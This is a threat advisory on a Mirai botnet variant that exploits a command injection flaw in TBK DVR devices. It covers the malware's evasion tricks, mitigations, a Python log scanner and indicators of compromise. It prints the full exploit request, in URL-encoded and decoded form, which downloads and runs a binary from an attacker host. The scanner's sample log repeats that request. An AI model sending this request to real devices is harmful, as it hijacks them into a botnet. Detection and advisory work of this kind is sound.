New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.

This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.

Exploitation Vector & Payload Delivery

Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.

The injected command downloads and executes an ARM32 binary:

```text
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26[.]36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
```

URL-decoded, the injected shell command reads:

```bash
cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
```

This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.

Malware Modifications & Evasion Tactics

The Mirai variant incorporates several upgrades:

1. RC4 String Encryption

  • Uses an RC4 key that is itself stored XOR-encrypted: 6e7976666525a97639777d2d7f303177
  • Decrypted strings stored in a custom DataDecrypted structure for runtime access

2. Anti-Analysis Checks

  • Scans /proc/[PID]/cmdline for VMware/QEMU indicators
  • Validates the execution path against hardcoded directories: /dev/shm, /tmp, /var/run

3. Process Whitelisting

  • Terminates competing malware processes such as Hajime, Anarchy, and Mozi to monopolize device resources

Infection Metrics & Mitigation

Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.

Mitigation strategies and how to implement them:

  • Firmware Patching: apply TBK’s 20240412+ updates
  • Network Segmentation: isolate DVRs from critical infrastructure
  • Input Sanitization: block special characters in the mdb/mdc parameters
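As an added defender-side example (not code from the article or from Kaspersky), the following Python scanner applies the sanitization check from the mitigation list to web-server request lines: it URL-decodes requests to /device.rsp and flags mdb/mdc values that carry shell metacharacters. The log lines and the 192.0.2.10 address are constructed for the example.

```python
"""Flag CVE-2024-3721-style command injection attempts against /device.rsp.

Added example, not from the original article. It parses HTTP request lines
as found in a web-server access log, URL-decodes the query string, and
reports requests whose mdb/mdc parameters contain shell metacharacters.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Characters that a legitimate mdb/mdc value never needs; any hit is a finding.
SHELL_META = re.compile(r"[;&|`$<>\n\r]|\$\(")

# Constructed sample log lines (not real telemetry); 192.0.2.10 is TEST-NET.
SAMPLE_LOG = """\
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F192.0.2.10%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
GET /device.rsp?opt=sys&cmd=status&mdb=sos&mdc=reboot HTTP/1.1
POST /login.rsp?user=admin HTTP/1.1
GET /device.rsp?opt=sys&mdc=%60id%60 HTTP/1.1
"""


def parse_request_line(line: str):
    """Return (method, path, params) for a 'METHOD /path?query HTTP/x' line, else None."""
    parts = line.strip().split(" ")
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    split = urlsplit(target)
    # parse_qs percent-decodes values, so %3B becomes ';' here.
    params = parse_qs(split.query, keep_blank_values=True)
    return method, split.path, params


def injection_findings(params: dict) -> list:
    """Return [(param, decoded_value)] for mdb/mdc values holding shell metacharacters."""
    findings = []
    for name in ("mdb", "mdc"):
        for value in params.get(name, []):
            if SHELL_META.search(value):
                findings.append((name, value))
    return findings


def scan_log(text: str) -> list:
    """Scan access-log text; return one alert dict per suspicious /device.rsp request."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_request_line(line)
        if parsed is None or parsed[1] != "/device.rsp":
            continue
        findings = injection_findings(parsed[2])
        if findings:
            alerts.append({"line": lineno, "method": parsed[0], "findings": findings})
    return alerts
```

Running `scan_log(SAMPLE_LOG)` flags lines 1 and 4 only; the benign reboot request on line 2 and the unrelated endpoint on line 3 pass.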

Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Device owners should prioritize firmware updates and consider factory resets for compromised units.

Indicators of Compromise

IPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc

This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.

The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.
